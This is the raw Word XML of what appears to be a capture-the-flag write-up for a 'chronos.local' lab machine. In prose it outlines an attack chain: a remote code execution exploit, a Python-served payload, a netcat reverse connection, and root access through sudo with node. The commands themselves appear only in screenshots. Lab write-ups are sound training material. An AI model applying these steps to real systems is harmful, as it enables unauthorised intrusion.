      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B72983" w14:textId="77777777" w:rsidR="00552A78" w:rsidRPr="00552A78" w:rsidRDefault="00552A78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B42FCF6" w14:textId="617D6988" w:rsidR="003A568C" w:rsidRDefault="00552A78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="310EECB9" wp14:editId="249C4CE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4447619" cy="838095"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21125"/>
                <wp:lineTo x="21464" y="21125"/>
                <wp:lineTo x="21464" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="2129650567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50567" name="Picture 1" descr="A close-up of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it to the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58622643" w14:textId="77777777" w:rsidR="003A568C" w:rsidRDefault="003A568C"/>
    <w:p w14:paraId="35275A52" w14:textId="4512B9CF" w:rsidR="00D14275" w:rsidRDefault="00D14275"/>
    <w:p w14:paraId="74359826" w14:textId="77777777" w:rsidR="009021C0" w:rsidRDefault="009021C0"/>
    <w:p w14:paraId="54751051" w14:textId="4A683987" w:rsidR="00D21621" w:rsidRDefault="00007CF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="569EF08A" wp14:editId="1B73D905">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>202095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1580952" cy="200000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18573"/>
                <wp:lineTo x="21348" y="18573"/>
                <wp:lineTo x="21348" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7646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97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then modify the User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51399B" w14:textId="15B135C3" w:rsidR="00007CF0" w:rsidRDefault="00007CF0"/>
    <w:p w14:paraId="54B1E40A" w14:textId="4FD34301" w:rsidR="00D21621" w:rsidRDefault="003F0A22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A964B0B" wp14:editId="76BE600A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4647619" cy="276190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19410"/>
                <wp:lineTo x="21426" y="19410"/>
                <wp:lineTo x="21426" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="87084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7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: I didn’t get this part until I was looking through the source code of the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED68086" w14:textId="04C68B1B" w:rsidR="003F0A22" w:rsidRDefault="003F0A22"/>
    <w:p w14:paraId="2F9EFE3D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7A4AE600" w14:textId="52B4FD58" w:rsidR="007307F9" w:rsidRDefault="00FD6A2B" w:rsidP="00817657">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exploiting System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46844886" w14:textId="0690882E" w:rsidR="007307F9" w:rsidRDefault="00817657">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71C501AF" wp14:editId="389441E8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2372360" cy="902335"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20977"/>
                <wp:lineTo x="21507" y="20977"/>
                <wp:lineTo x="21507" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="12710899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9989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AF73" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="798148D2" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="24E631C4" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="1245C7A5" w14:textId="78AB7446" w:rsidR="007307F9" w:rsidRDefault="00184A91">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45FC783D" wp14:editId="6498A0F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>378708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2818765" cy="932180"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21188"/>
                <wp:lineTo x="21459" y="21188"/>
                <wp:lineTo x="21459" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="212928748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7487" name="Picture 1" descr="A computer screen shot of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D6">
        <w:t>Found an exploit for the service in the backend folder.</w:t>
      </w:r>
      <w:r w:rsidR="009857A1">
        <w:t xml:space="preserve"> The process has an exploit for remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0544A6" w14:textId="4CEE9A8A" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5EE1914D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="797DC1F2" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="05851671" w14:textId="22A7A8A8" w:rsidR="007307F9" w:rsidRDefault="001E03EC" w:rsidP="00184A91">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Python Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67AD49" w14:textId="58F7D3F3" w:rsidR="007307F9" w:rsidRDefault="00C34CAF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="368AEDD1" wp14:editId="30C2CFF3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="421513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76" y="20855"/>
                <wp:lineTo x="21476" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="8789280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8060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0F782" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4CD93840" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="442A3CCC" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="63AFF28D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7476C451" w14:textId="2ABFFBC0" w:rsidR="00ED266B" w:rsidRDefault="00ED266B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Victim Machine</w:t>
      </w:r>
      <w:r w:rsidR="00880210">
        <w:t xml:space="preserve"> will execute the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66D23E" w14:textId="56A9E0AE" w:rsidR="007307F9" w:rsidRDefault="00D325F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E1D5391" wp14:editId="79C2D52A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>594</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2790190" cy="1609090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21225"/>
                <wp:lineTo x="21384" y="21225"/>
                <wp:lineTo x="21384" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="66073353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3539" name="Picture 1" descr="A computer screen shot of a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D788" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3B2D5922" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="6F5F9C4D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0424692F" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="591EC413" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0340ED55" w14:textId="2D1BC1EA" w:rsidR="007307F9" w:rsidRDefault="00812DC7">
      <w:r>
        <w:t xml:space="preserve">Now the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will connect to the victim machine.</w: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FED62AD" wp14:editId="33771E62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419475" cy="899795"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21036"/>
                <wp:lineTo x="21540" y="21036"/>
                <wp:lineTo x="21540" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5313350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3505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8F0">
        <w:t xml:space="preserve"> Now I am in I can begin exploiting the actual system to gain privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1BC085" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="0A649238" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="68961741" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="65927B27" w14:textId="4181D26A" w:rsidR="007307F9" w:rsidRDefault="00097D96" w:rsidP="007C0D22">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E243B" w14:textId="50E3D0FC" w:rsidR="00097D96" w:rsidRDefault="00684C27" w:rsidP="004A685C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A8E35" w14:textId="3357BDDD" w:rsidR="007307F9" w:rsidRDefault="006E00E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF6BCA4" wp14:editId="1453E330">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>183540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3628571" cy="409524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20124"/>
                <wp:lineTo x="21434" y="20124"/>
                <wp:lineTo x="21434" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="92186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621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flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is located in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imera</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BDA552" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="56C2A40E" w14:textId="7839CB32" w:rsidR="007307F9" w:rsidRDefault="00CB3E1A" w:rsidP="00CB3E1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55264722" w14:textId="14048D52" w:rsidR="007307F9" w:rsidRDefault="00AC694A" w:rsidP="00AC694A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBE0F5" w14:textId="0DAE2C01" w:rsidR="007307F9" w:rsidRDefault="00AC694A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="472876EF" wp14:editId="6DDAD21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4547870" cy="856615"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21136"/>
                <wp:lineTo x="21534" y="21136"/>
                <wp:lineTo x="21534" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="903074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74234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E1ED9" w14:textId="206AF17F" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="49D2D1D9" w14:textId="4649728B" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3EC52A0A" w14:textId="41BF5CC5" w:rsidR="007307F9" w:rsidRDefault="00AC694A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01547E14" wp14:editId="6556BDEB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>82138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3918585" cy="831215"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21286"/>
                <wp:lineTo x="21526" y="21286"/>
                <wp:lineTo x="21526" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="15402671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7107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44A4D060" w:rsidR="007307F9" w:rsidRDefault="00EE2CDF" w:rsidP="00EE2CDF">
      <w:pPr>
        <w:pStyle w:val="Heading2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F5CA157" wp14:editId="01DAC094">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>245415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="747395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20921"/>
                <wp:lineTo x="21538" y="20921"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17085365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36507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oot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB0E6E4" w14:textId="0236B400" w:rsidR="007307F9" w:rsidRDefault="00EE2CDF">
      <w:r>
        <w:t>Now I can get the root flag in the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0598A" w14:textId="1ACD11E9" w:rsidR="007307F9" w:rsidRDefault="001F3FB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4834DFBA" wp14:editId="6D328552">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-110861</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4104762" cy="714286"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20754"/>
                <wp:lineTo x="21453" y="20754"/>
                <wp:lineTo x="21453" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6697410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41069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7CF0"/>
    <w:rsid w:val="00026445"/>
    <w:rsid w:val="00033FD0"/>
    <w:rsid w:val="00040CBC"/>
    <w:rsid w:val="00097D96"/>
    <w:rsid w:val="000E33A7"/>
    <w:rsid w:val="000F7507"/>
    <w:rsid w:val="00106C4B"/>
    <w:rsid w:val="00110171"/>
    <w:rsid w:val="00113309"/>
    <w:rsid w:val="0012605A"/>
    <w:rsid w:val="00184A91"/>
    <w:rsid w:val="001D7903"/>
    <w:rsid w:val="001E03EC"/>
    <w:rsid w:val="001E7882"/>
    <w:rsid w:val="001F3FB3"/>
    <w:rsid w:val="00231056"/>
    <w:rsid w:val="002A65A9"/>
    <w:rsid w:val="002B12A6"/>
    <w:rsid w:val="002D05F4"/>
    <w:rsid w:val="002E16D1"/>
    <w:rsid w:val="00335797"/>
    <w:rsid w:val="003A568C"/>
    <w:rsid w:val="003E2848"/>
    <w:rsid w:val="003F0A22"/>
    <w:rsid w:val="0040039D"/>
    <w:rsid w:val="00430F58"/>
    <w:rsid w:val="00452BCF"/>
    <w:rsid w:val="00456858"/>
    <w:rsid w:val="00477F52"/>
    <w:rsid w:val="00495596"/>
    <w:rsid w:val="004A685C"/>
    <w:rsid w:val="004C7D1B"/>
    <w:rsid w:val="00503ABC"/>
    <w:rsid w:val="00507371"/>
    <w:rsid w:val="005203A9"/>
    <w:rsid w:val="00552A78"/>
    <w:rsid w:val="00566BF1"/>
    <w:rsid w:val="005805C4"/>
    <w:rsid w:val="005A030E"/>
    <w:rsid w:val="005C56B4"/>
    <w:rsid w:val="00643155"/>
    <w:rsid w:val="00684C27"/>
    <w:rsid w:val="006C3874"/>
    <w:rsid w:val="006D0AA7"/>
    <w:rsid w:val="006E00E4"/>
    <w:rsid w:val="0070094F"/>
    <w:rsid w:val="00726DD1"/>
    <w:rsid w:val="007307F9"/>
    <w:rsid w:val="0074761C"/>
    <w:rsid w:val="00773575"/>
    <w:rsid w:val="00775F2D"/>
    <w:rsid w:val="007908F0"/>
    <w:rsid w:val="007C0D22"/>
    <w:rsid w:val="007E0CD4"/>
    <w:rsid w:val="007F2A2F"/>
    <w:rsid w:val="00810755"/>
    <w:rsid w:val="00812DC7"/>
    <w:rsid w:val="00817657"/>
    <w:rsid w:val="00880210"/>
    <w:rsid w:val="00892B8A"/>
    <w:rsid w:val="008B0FA7"/>
    <w:rsid w:val="009021C0"/>
    <w:rsid w:val="0097351B"/>
    <w:rsid w:val="0097715A"/>
    <w:rsid w:val="00977C7B"/>
    <w:rsid w:val="009857A1"/>
    <w:rsid w:val="009A4D68"/>
    <w:rsid w:val="009A4F29"/>
    <w:rsid w:val="009C32F8"/>
    <w:rsid w:val="009C4686"/>
    <w:rsid w:val="00A06CB6"/>
    <w:rsid w:val="00A40A37"/>
    <w:rsid w:val="00AA0C73"/>
    <w:rsid w:val="00AA18CC"/>
    <w:rsid w:val="00AB4AC5"/>
    <w:rsid w:val="00AC694A"/>
    <w:rsid w:val="00AF3933"/>
    <w:rsid w:val="00B33D3F"/>
    <w:rsid w:val="00B42EE0"/>
    <w:rsid w:val="00B43545"/>
    <w:rsid w:val="00BA41F1"/>
    <w:rsid w:val="00BC1652"/>
    <w:rsid w:val="00BC6A2A"/>
    <w:rsid w:val="00BD7CD4"/>
    <w:rsid w:val="00BE23D6"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C34CAF"/>
    <w:rsid w:val="00C506B7"/>
    <w:rsid w:val="00C668EE"/>
    <w:rsid w:val="00C746CA"/>
    <w:rsid w:val="00CB3E1A"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00CF2462"/>
    <w:rsid w:val="00D14275"/>
    <w:rsid w:val="00D21621"/>
    <w:rsid w:val="00D325F4"/>
    <w:rsid w:val="00D54D01"/>
    <w:rsid w:val="00D854A3"/>
    <w:rsid w:val="00DC0550"/>
    <w:rsid w:val="00DF1DDC"/>
    <w:rsid w:val="00DF4B1B"/>
    <w:rsid w:val="00E574B5"/>
    <w:rsid w:val="00E66DFE"/>
    <w:rsid w:val="00ED266B"/>
    <w:rsid w:val="00ED3753"/>
    <w:rsid w:val="00EE2CDF"/>
    <w:rsid w:val="00EF3DC7"/>
    <w:rsid w:val="00F26B47"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F70C1B"/>
    <w:rsid w:val="00FB64AE"/>
    <w:rsid w:val="00FC0F0A"/>
    <w:rsid w:val="00FC5350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54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4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07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A78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84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://chronos.local" TargetMode="External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source code; burp suite; sudo node</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-21T14:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>